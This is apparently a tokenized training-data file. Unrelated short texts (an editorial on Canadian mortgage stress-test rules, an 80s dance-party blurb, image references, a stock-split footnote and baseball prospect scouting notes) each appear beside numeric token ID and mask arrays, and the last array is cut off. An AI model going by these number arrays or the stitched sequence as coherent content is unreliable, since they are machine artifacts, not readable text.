Editorial: House rules You can understand why home builders are concerned. Home construction off Blackmarsh Road.— Photo by Keith Gosse/The Telegram On Oct. 3, the federal government introduced new rules restricting the way mortgages will be federally insured. It says it wants to put consistent rules in place, particularly to deal with the problem of foreign home purchases in Canada; part of that is to include a “stress test” that would ensure mortagees could still afford to make payments if interest rates rise. But the move is raising concerns in the home construction industry. The home builders suggest that the new rules, especially in a soft Atlantic market where pensioners and first-time home buyers are currently the strength in the market, could knock 30 to 40 per cent of buyers out of the picture, because they wouldn’t qualify for mortgage insurance any longer. It’s understandable that Atlantic homebuilders would be concerned about the effect of a mortgage fitness test; while the test is meant to slow overheated housing markets like Toronto and Vancouver, it’s easy to see the process could very well slow housing purchases in other markets. On one hand, that’s a bad thing; a depressed housing market means fewer homes being built, less investment in new construction and fewer jobs in the home building sector. That being said, there are also reasonable arguments for the need for a test to see if those taking out mortgages can actually afford them. We’ve gotten very used to low interest rates, and household indebtedness has grown steadily across the country. We haven’t shown any real sign that the majority of Canadians are willing and able to live within their means. If anything, it’s been the opposite: many families seem prepared to leverage themselves to a tremendous extent, borrowing for homes and cars and vacations and the latest and best appliances. Ask homeowners today how much of their paycheque they put aside for emergencies, and you shouldn’t be surprised if the answer is “nothing.” You have to ask a simple question: how long can this go on? It’s close to being the very definition of a housing bubble. And while government action may slow the market, that’s probably a better result than having a larger upwards shift in the interest rate not only upending the housing apple cart, but cutting down all the apple trees and burning them for firewood, too. Just imagine the effect on older members of our society; many pensions have shrunk or disappeared, and homes are often the only major asset seniors end up with. A huge devaluation of that asset is a terrifying prospect indeed. The best idea is somewhere in the middle — moderate caps on mortgage growth, and a much greater moderation in all of our expectations. The home builders make a good case: they are an integral part of the economy. But the key should be moderation in all things, particularly in a country where homebuyers are anything but moderate about what they can afford.
[ 1, 14059, 616, 29901, 5619, 6865, 13, 13, 3492, 508, 2274, 2020, 3271, 2048, 414, 526, 15041, 29889, 13, 13, 11184, 7632, 1283, 6054, 3034, 845, 9321, 22416, 1963, 3747, 491, 27179, 402, 359, 344, 29914, 1576, 9699, 1393, 13, 13, 2951, 4756, 29889, 29871, 29941, 29892, 278, 17097, 5874, 9129, 716, 6865, 9250, 292, 278, 982, 5758, 29887, 1179, 674, 367, 12067, 635, 1663, 2955, 29889, 739, 4083, 372, 10753, 304, 1925, 13747, 6865, 297, 2058, 29892, 10734, 304, 5376, 411, 278, 1108, 310, 9117, 3271, 10596, 2129, 297, 7400, 29936, 760, 310, 393, 338, 304, 3160, 263, 1346, 710, 404, 1243, 30024, 393, 723, 9801, 5758, 482, 267, 1033, 1603, 21750, 304, 1207, 5146, 1860, 565, 4066, 19257, 14451, 29889, 13, 13, 6246, 278, 4337, 338, 29263, 21838, 297, 278, 3271, 7632, 13661, 29889, 13, 13, 1576, 3271, 2048, 414, 4368, 393, 278, 716, 6865, 29892, 7148, 297, 263, 4964, 19948, 9999, 988, 282, 2673, 414, 322, 937, 29899, 2230, 3271, 15649, 414, 526, 5279, 278, 9324, 297, 278, 9999, 29892, 1033, 18232, 29871, 29941, 29900, 304, 29871, 29946, 29900, 639, 1644, 310, 15649, 414, 714, 310, 278, 7623, 29892, 1363, 896, 7656, 30010, 29873, 4021, 1598, 363, 5758, 29887, 482, 1663, 18541, 738, 5520, 29889, 13, 13, 3112, 30010, 29879, 2274, 519, 393, 19948, 3271, 4282, 414, 723, 367, 15041, 1048, 278, 2779, 310, 263, 5758, 29887, 482, 6216, 2264, 1243, 29936, 1550, 278, 1243, 338, 6839, 304, 5232, 975, 354, 630, 27261, 2791, 1691, 763, 17612, 322, 478, 29711, 29892, 372, 30010, 29879, 4780, 304, 1074, 278, 1889, 1033, 1407, 1532, 5232, 27261, 10596, 2129, 297, 916, 2791, 1691, 29889, 13, 13, 2951, 697, 1361, 29892, 393, 30010, 29879, 263, 4319, 2655, 29936, 263, 316, 13120, 27261, 9999, 2794, 28145, 17774, 1641, 4240, 29892, 3109, 13258, 358, 297, 716, 7632, 322, 28145, 17643, 297, 278, 3271, 5214, 17535, 29889, 13, 13, 7058, 1641, 1497, 29892, 727, 526, 884, 15590, 6273, 363, 278, 817, 363, 263, 1243, 304, 1074, 565, 1906, 13, 13, 29873, 5086, 714, 5758, 29887, 1179, 508, 2869, 21750, 963, 29889, 1334, 30010, 345, 2355, 841, 1407, 1304, 304, 4482, 4066, 19257, 29892, 322, 22329, 5704, 3116, 287, 2264, 756, 21633, 28325, 2354, 4822, 278, 4234, 29889, 13, 13, 4806, 7359, 30010, 29873, 4318, 738, 1855, 1804, 393, 278, 13638, 310, 9145, 5834, 526, 17762, 322, 2221, 304, 5735, 2629, 1009, 2794, 29889, 13, 13, 3644, 3099, 29892, 372, 30010, 29879, 1063, 278, 11564, 29901, 1784, 13175, 2833, 13240, 304, 454, 19698, 6053, 304, 263, 14586, 355, 681, 15834, 29892, 27942, 292, 363, 17774, 322, 18647, 322, 11757, 800, 322, 278, 9281, 322, 1900, 623, 492, 2925, 29889, 26579, 3271, 776, 414, 9826, 920, 1568, 310, 1009, 5146, 1173, 802, 896, 1925, 17786, 363, 11176, 1885, 2478, 29892, 322, 366, 9273, 30010, 29873, 367, 18014, 565, 278, 1234, 338, 1346, 28450, 3178, 13, 13, 3492, 505, 304, 2244, 263, 2560, 1139, 29901, 920, 1472, 508, 445, 748, 373, 29973, 13, 13, 3112, 30010, 29879, 3802, 304, 1641, 278, 1407, 5023, 310, 263, 27261, 289, 23232, 29889, 1126, 1550, 5874, 3158, 1122, 5232, 278, 9999, 29892, 393, 30010, 29879, 3117, 263, 2253, 1121, 1135, 2534, 263, 7200, 701, 2935, 9500, 297, 278, 4066, 6554, 451, 871, 701, 2548, 278, 27261, 26163, 7774, 29892, 541, 28967, 1623, 599, 278, 26163, 10697, 322, 25535, 963, 363, 3974, 6115, 29892, 2086, 29889, 3387, 14034, 278, 2779, 373, 9642, 5144, 310, 1749, 12459, 29936, 1784, 282, 5580, 505, 14653, 2960, 470, 24273, 29892, 322, 17774, 526, 4049, 278, 871, 4655, 24342, 6940, 18930, 1095, 701, 411, 29889, 319, 12176, 316, 4387, 362, 310, 393, 24342, 338, 263, 1935, 29878, 9215, 27289, 6200, 29889, 13, 13, 1576, 1900, 2969, 338, 9051, 297, 278, 7256, 813, 17768, 403, 26091, 373, 5758, 29887, 482, 14321, 29892, 322, 263, 1568, 7621, 17768, 362, 297, 599, 310, 1749, 2149, 800, 29889, 13, 13, 1576, 3271, 2048, 414, 1207, 263, 1781, 1206, 29901, 896, 526, 385, 10160, 760, 310, 278, 26504, 29889, 1205, 278, 1820, 881, 367, 17768, 362, 297, 599, 2712, 29892, 10734, 297, 263, 4234, 988, 3271, 2423, 29891, 414, 526, 3099, 541, 17768, 403, 1048, 825, 896, 508, 21750, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Blog Tainted Love 80s Dance Party w/DJ Jane Elizabeth – 6/15/2018 Soft Cell’s pioneering 1981 cover of the Northern Soul classic, “Tainted Love,” is the inspiration for this awesome 80s dance party. Building on a solid foundation of New Wave, we’ll dig deeper into the catalog of massive hits and overlooked misses from the late 70s through the early 90s – pivotal years in musical history that blurred the lines between Analog and Digital, Disco and Synthpop, Funk and Hip-Hop. A time when Alternative was called Post-Punk, Indie actually meant independent, and Throbbing Gristle’s “Hot on the Heels of Love” surely could have been alongside Blondie’s “Heart of Glass” on the charts…with today’s perspective. Other passions include CBGB-era New York, Batcave-era London – Punk Rock, Glam Rock, Kraut Rock, Girl Rock, Dad Rock, Rockabilly, Ska, Machine Soul, Blue-Eyed Soul, Darkwave, Coldwave – plus some guilty pleasures in the (strictly) Old-School Rap department.
[ 1, 350, 1188, 13, 13, 29911, 2365, 287, 8155, 29871, 29947, 29900, 29879, 22440, 9173, 281, 29914, 29928, 29967, 10447, 13061, 785, 29871, 29953, 29914, 29896, 29945, 29914, 29906, 29900, 29896, 29947, 13, 13, 6295, 615, 19413, 30010, 29879, 29323, 3241, 29871, 29896, 29929, 29947, 29896, 4612, 310, 278, 14299, 27339, 22037, 29892, 1346, 29911, 2365, 287, 8155, 3995, 338, 278, 8681, 12232, 363, 445, 29663, 29871, 29947, 29900, 29879, 17948, 6263, 29889, 17166, 373, 263, 7773, 22778, 310, 1570, 399, 1351, 29892, 591, 30010, 645, 4697, 25871, 964, 278, 16653, 310, 20364, 19572, 322, 975, 6914, 287, 3052, 267, 515, 278, 5683, 29871, 29955, 29900, 29879, 1549, 278, 4688, 29871, 29929, 29900, 29879, 785, 282, 440, 7288, 2440, 297, 9636, 4955, 393, 1999, 332, 1127, 278, 3454, 1546, 11597, 468, 322, 15918, 29892, 3295, 1111, 322, 10829, 386, 7323, 29892, 383, 2960, 322, 379, 666, 29899, 29950, 459, 29889, 319, 931, 746, 12440, 1230, 471, 2000, 4918, 29899, 29925, 2960, 29892, 1894, 347, 2869, 6839, 7417, 29892, 322, 498, 307, 1327, 292, 1632, 391, 280, 30010, 29879, 1346, 28917, 373, 278, 940, 1379, 310, 8155, 30024, 18880, 1033, 505, 1063, 19963, 3164, 898, 347, 30010, 29879, 1346, 3868, 442, 310, 402, 605, 30024, 373, 278, 24469, 30098, 2541, 9826, 30010, 29879, 18520, 29889, 5901, 1209, 1080, 3160, 315, 29933, 7210, 29899, 1572, 1570, 3088, 29892, 12579, 1113, 345, 29899, 1572, 4517, 785, 22723, 8027, 29892, 402, 5288, 8027, 29892, 19387, 329, 8027, 29892, 18620, 8027, 29892, 360, 328, 8027, 29892, 8027, 4427, 368, 29892, 317, 1335, 29892, 6189, 27339, 29892, 10924, 29899, 29923, 28133, 27339, 29892, 15317, 27766, 29892, 26731, 27766, 785, 2298, 777, 27719, 5644, 25414, 297, 278, 313, 710, 919, 368, 29897, 8198, 29899, 4504, 1507, 16866, 14311, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
![](brjcancer00406-0103.tif "scanned-page"){.88} ![](brjcancer00406-0104.tif "scanned-page"){.89} ![](brjcancer00406-0105.tif "scanned-page"){.90}
[ 1, 1738, 29961, 850, 1182, 29926, 3068, 2265, 29900, 29900, 29946, 29900, 29953, 29899, 29900, 29896, 29900, 29941, 29889, 29873, 361, 376, 1557, 11310, 29899, 3488, 1159, 26139, 29947, 29947, 29913, 13, 13, 21298, 850, 1182, 29926, 3068, 2265, 29900, 29900, 29946, 29900, 29953, 29899, 29900, 29896, 29900, 29946, 29889, 29873, 361, 376, 1557, 11310, 29899, 3488, 1159, 26139, 29947, 29929, 29913, 13, 13, 21298, 850, 1182, 29926, 3068, 2265, 29900, 29900, 29946, 29900, 29953, 29899, 29900, 29896, 29900, 29945, 29889, 29873, 361, 376, 1557, 11310, 29899, 3488, 1159, 26139, 29929, 29900, 29913, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
* The company conducted a 2-for-1 stock split of common stock with an effective date of July 1, 2015. These figures were retroactively adjusted to reflect the stock split.* The company conducted a 2-for-1 stock split of common stock with an effective date of October 1, 2019. These figures were retroactively adjusted to reflect the stock split.
[ 1, 334, 450, 5001, 18043, 263, 29871, 29906, 29899, 1454, 29899, 29896, 10961, 6219, 310, 3619, 10961, 411, 385, 11828, 2635, 310, 5468, 29871, 29896, 29892, 29871, 29906, 29900, 29896, 29945, 29889, 4525, 13994, 892, 24877, 627, 3598, 10365, 287, 304, 9432, 278, 10961, 6219, 5575, 450, 5001, 18043, 263, 29871, 29906, 29899, 1454, 29899, 29896, 10961, 6219, 310, 3619, 10961, 411, 385, 11828, 2635, 310, 5533, 29871, 29896, 29892, 29871, 29906, 29900, 29896, 29929, 29889, 4525, 13994, 892, 24877, 627, 3598, 10365, 287, 304, 9432, 278, 10961, 6219, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
2014 Mid Atlantic Top Prospect Showcase Steven Cahill - RHP - 2015 - Hammonton, NJ A lean, athletic right-handed pitcher with a power arm, Cahill posted the top velocity of the event at 86 mph. He worked consistently at 83-86 and showed a sharp 11-5 breaking ball. Jason King - OF - 2015 - Baltimore, MD King has the look of a polished, next level hitter with a swing path that translates well into game action. He is very short to the baseball and generates above average bat speed. He also ran a 6.95 60 yard dash. Christian Tailor - RHP - 2015 - Vienna, VA Tailor impresses on both sides of the baseball and in all facets of the game. After throwing 87 mph from the outfield and showing off good bat speed, he took the mound and showed off a live 83-85 mph fastball and nice feel for his secondaries. Storm Parish - RHP - 2015 - Mendham, NJ Parish showed off one of the showcase's best pure arms, cranking his fastball up to 85 mph and living mostly at 81-84. He also flashed feel for a sharp curveball and late diving changeup. Mark McKee - RHP - 2015 - Charles Town, WV A strongly built right-hander with a fastball that range from 82-84 mph, McKee knows how to locate and effectively mix his sharp breaking ball to both sides. Luke Schaffer - 3B - 2015 - Fallston, MD Schaffer flashes good pull side carry from the right-hand batter's box and his power potential immediately shows up in game action. His ability to hit to the middle of the field also stands out. Stephen Debellis - SS - 2015 - Marlton, NJ Debellis showed athletic actions on the infield and a strong throwing arm across the diamond. He threw 82 mph across and ran a 7.08 60 yard dash. He also showed off a compact, repeatable line drive stroke. Ryan Fuscaldo - OF - 2015 - Phoenixville, PA Fuscaldo stood out on the strength of his speed and athleticism, posting a 6.85 60 yard dash time. He also threw 81 mph from the outfield and flashed a solid line drive stroke. Marc Galvan - RHP - 2015 - Brielle, NJ Galvan topped out at 83 mph with his fastball, showing good life through the zone and creating an effective downhill plane. He has a strong, durable frame and missed bats with the late hop on his fastball. Matthew Kooker - SS - 2015 - Princeton Junction, NJ Kooker did a little bit of everything at the event, topping out at 83 mph on the mound, showing off a compact line drive stroke and showing off a sound game action approach in the process. Sam Partee - C - 2015 - Richmond, VA A solid backstop who posted a 2.02 pop time from behind the dish, Partee was particularly impressive with the bat, showing off good bat speed and power to the gaps. Ashton Raines - RHP - 2015 - Wallingford, PA Armed with an 81-83 mph fastball, Raines shows off a fast right arm and works consistently down in the strike zone. He also has the sharp secondary arsenal to go with his fastball, including a diving changeup and sharp breaking ball. Eric Small - C - 2015 - Downingtown, PA A well balanced player both defensively and offensively, Small shows an advanced line drive swing path at the plate and sound receiving actions behind the plate.
[ 1, 29871, 29906, 29900, 29896, 29946, 13370, 19948, 7488, 1019, 21494, 7704, 4878, 13, 13, 7789, 854, 315, 801, 453, 13, 29899, 390, 3954, 448, 29871, 29906, 29900, 29896, 29945, 448, 26356, 609, 265, 29892, 405, 29967, 13, 29909, 20793, 29892, 28563, 293, 1492, 29899, 3179, 287, 15905, 261, 411, 263, 3081, 5075, 29892, 315, 801, 453, 8059, 278, 2246, 12885, 310, 278, 1741, 472, 29871, 29947, 29953, 286, 561, 29889, 940, 3796, 5718, 2705, 472, 29871, 29947, 29941, 29899, 29947, 29953, 322, 10018, 263, 15301, 29871, 29896, 29896, 29899, 29945, 16679, 8287, 29889, 13, 13, 29967, 1658, 4088, 13, 29899, 8079, 448, 29871, 29906, 29900, 29896, 29945, 448, 26767, 29892, 20672, 13, 29968, 292, 756, 278, 1106, 310, 263, 1248, 3276, 29892, 2446, 3233, 298, 5171, 411, 263, 24500, 2224, 393, 5578, 1078, 1532, 964, 3748, 3158, 29889, 940, 338, 1407, 3273, 304, 278, 21573, 322, 16785, 2038, 6588, 17152, 6210, 29889, 940, 884, 6350, 263, 29871, 29953, 29889, 29929, 29945, 29871, 29953, 29900, 29413, 12569, 29889, 13, 13, 18687, 713, 323, 737, 272, 13, 29899, 390, 3954, 448, 29871, 29906, 29900, 29896, 29945, 448, 25309, 29892, 478, 29909, 13, 29911, 737, 272, 21210, 267, 373, 1716, 11192, 310, 278, 21573, 322, 297, 599, 4024, 1691, 310, 278, 3748, 29889, 2860, 17452, 29871, 29947, 29955, 286, 561, 515, 278, 714, 2671, 322, 6445, 1283, 1781, 17152, 6210, 29892, 540, 3614, 278, 286, 618, 322, 10018, 1283, 263, 5735, 29871, 29947, 29941, 29899, 29947, 29945, 286, 561, 5172, 2135, 322, 7575, 4459, 363, 670, 1473, 4314, 29889, 13, 13, 855, 555, 1459, 728, 13, 29899, 390, 3954, 448, 29871, 29906, 29900, 29896, 29945, 448, 341, 355, 3391, 29892, 405, 29967, 13, 2177, 728, 10018, 1283, 697, 310, 278, 1510, 4878, 29915, 29879, 1900, 8296, 10188, 29892, 274, 661, 9292, 670, 5172, 2135, 701, 304, 29871, 29947, 29945, 286, 561, 322, 8471, 11149, 472, 29871, 29947, 29896, 29899, 29947, 29946, 29889, 940, 884, 11013, 287, 4459, 363, 263, 15301, 11672, 2135, 322, 5683, 1933, 292, 1735, 786, 29889, 13, 13, 9802, 24053, 3905, 13, 29899, 390, 3954, 448, 29871, 29906, 29900, 29896, 29945, 448, 5322, 8421, 29892, 399, 29963, 13, 29909, 13818, 4240, 1492, 29899, 3179, 261, 411, 263, 5172, 2135, 393, 3464, 515, 29871, 29947, 29906, 29899, 29947, 29946, 286, 561, 29892, 24053, 3905, 9906, 920, 304, 26694, 322, 17583, 6837, 670, 15301, 16679, 8287, 304, 1716, 11192, 29889, 13, 13, 24126, 446, 1102, 2142, 571, 13, 29899, 29871, 29941, 29933, 448, 29871, 29906, 29900, 29896, 29945, 448, 14053, 7352, 29892, 20672, 13, 4504, 2142, 571, 11013, 267, 1781, 8206, 2625, 8677, 515, 278, 1492, 29899, 3179, 10193, 29915, 29879, 3800, 322, 670, 3081, 7037, 7389, 3697, 701, 297, 3748, 3158, 29889, 3600, 11509, 304, 7124, 304, 278, 7256, 310, 278, 1746, 884, 15028, 714, 29889, 13, 13, 7789, 9789, 7089, 514, 275, 13, 29899, 5886, 448, 29871, 29906, 29900, 29896, 29945, 448, 1085, 29880, 880, 29892, 405, 29967, 13, 10251, 514, 275, 10018, 28563, 293, 8820, 373, 278, 297, 2671, 322, 263, 4549, 17452, 5075, 4822, 278, 11502, 898, 29889, 940, 18318, 29871, 29947, 29906, 286, 561, 4822, 322, 6350, 263, 29871, 29955, 29889, 29900, 29947, 29871, 29953, 29900, 29413, 12569, 29889, 940, 884, 10018, 1283, 263, 11071, 29892, 12312, 519, 1196, 7899, 19782, 29889, 13, 13, 29934, 10094, 383, 375, 1052, 1867, 13, 29899, 8079, 448, 29871, 29906, 29900, 29896, 29945, 448, 29715, 4909, 29892, 17687, 13, 29943, 375, 1052, 1867, 8389, 714, 373, 278, 9324, 310, 670, 6210, 322, 28563, 293, 1608, 29892, 16742, 263, 29871, 29953, 29889, 29947, 29945, 29871, 29953, 29900, 29413, 12569, 931, 29889, 940, 884, 18318, 29871, 29947, 29896, 286, 561, 515, 278, 714, 2671, 322, 11013, 287, 263, 7773, 1196, 7899, 19782, 29889, 13, 13, 29924, 5666, 5208, 3703, 13, 29899, 390, 3954, 448, 29871, 29906, 29900, 29896, 29945, 448, 350, 374, 1808, 29892, 405, 29967, 13, 29954, 284, 3703, 304, 2986, 714, 472, 29871, 29947, 29941, 286, 561, 411, 670, 5172, 2135, 29892, 6445, 1781, 2834, 1549, 278, 10640, 322, 4969, 385, 11828, 1623, 29131, 10694, 29889, 940, 756, 263, 4549, 29892, 1411, 519, 3515, 322, 13726, 289, 1446, 411, 278, 5683, 8171, 373, 670, 5172, 2135, 29889, 13, 13, 29924, 1131, 13636, 476, 2550, 261, 13, 29899, 5886, 448, 29871, 29906, 29900, 29896, 29945, 448, 1588, 3742, 20666, 435, 651, 29892, 405, 29967, 13, 29968, 2550, 261, 1258, 263, 2217, 2586, 310, 4129, 472, 278, 1741, 29892, 304, 3262, 714, 472, 29871, 29947, 29941, 286, 561, 373, 278, 286, 618, 29892, 6445, 1283, 263, 11071, 1196, 7899, 19782, 322, 6445, 1283, 263, 6047, 3748, 3158, 2948, 297, 278, 1889, 29889, 13, 13, 22966, 25849, 29872, 13, 29899, 315, 448, 29871, 29906, 29900, 29896, 29945, 448, 28662, 29892, 478, 29909, 13, 29909, 7773, 1250, 9847, 1058, 8059, 263, 29871, 29906, 29889, 29900, 29906, 1835, 931, 515, 5742, 278, 270, 728, 29892, 25849, 29872, 471, 10734, 21210, 573, 411, 278, 17152, 29892, 6445, 1283, 1781, 17152, 6210, 322, 3081, 304, 278, 330, 2547, 29889, 13, 13, 2887, 400, 265, 390, 13116, 13, 29899, 390, 3954, 448, 29871, 29906, 29900, 29896, 29945, 448, 14406, 292, 4006, 29892, 17687, 13, 1433, 2168, 411, 385, 29871, 29947, 29896, 29899, 29947, 29941, 286, 561, 5172, 2135, 29892, 390, 13116, 3697, 1283, 263, 5172, 1492, 5075, 322, 1736, 5718, 2705, 1623, 297, 278, 21283, 10640, 29889, 940, 884, 756, 278, 15301, 16723, 564, 4881, 284, 304, 748, 411, 670, 5172, 2135, 29892, 3704, 263, 1933, 292, 1735, 786, 322, 15301, 16679, 8287, 29889, 13, 13, 2110, 293, 18285, 13, 29899, 315, 448, 29871, 29906, 29900, 29896, 29945, 448, 9943, 19680, 776, 29892, 17687, 13, 29909, 1532, 6411, 8362, 4847, 1716, 822, 575, 3598, 322, 1283, 575, 3598, 29892, 18285, 3697, 385, 12862, 1196, 7899, 24500, 2224, 472, 278, 15284, 322, 6047, 13442, 8820, 5742, 278, 15284, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 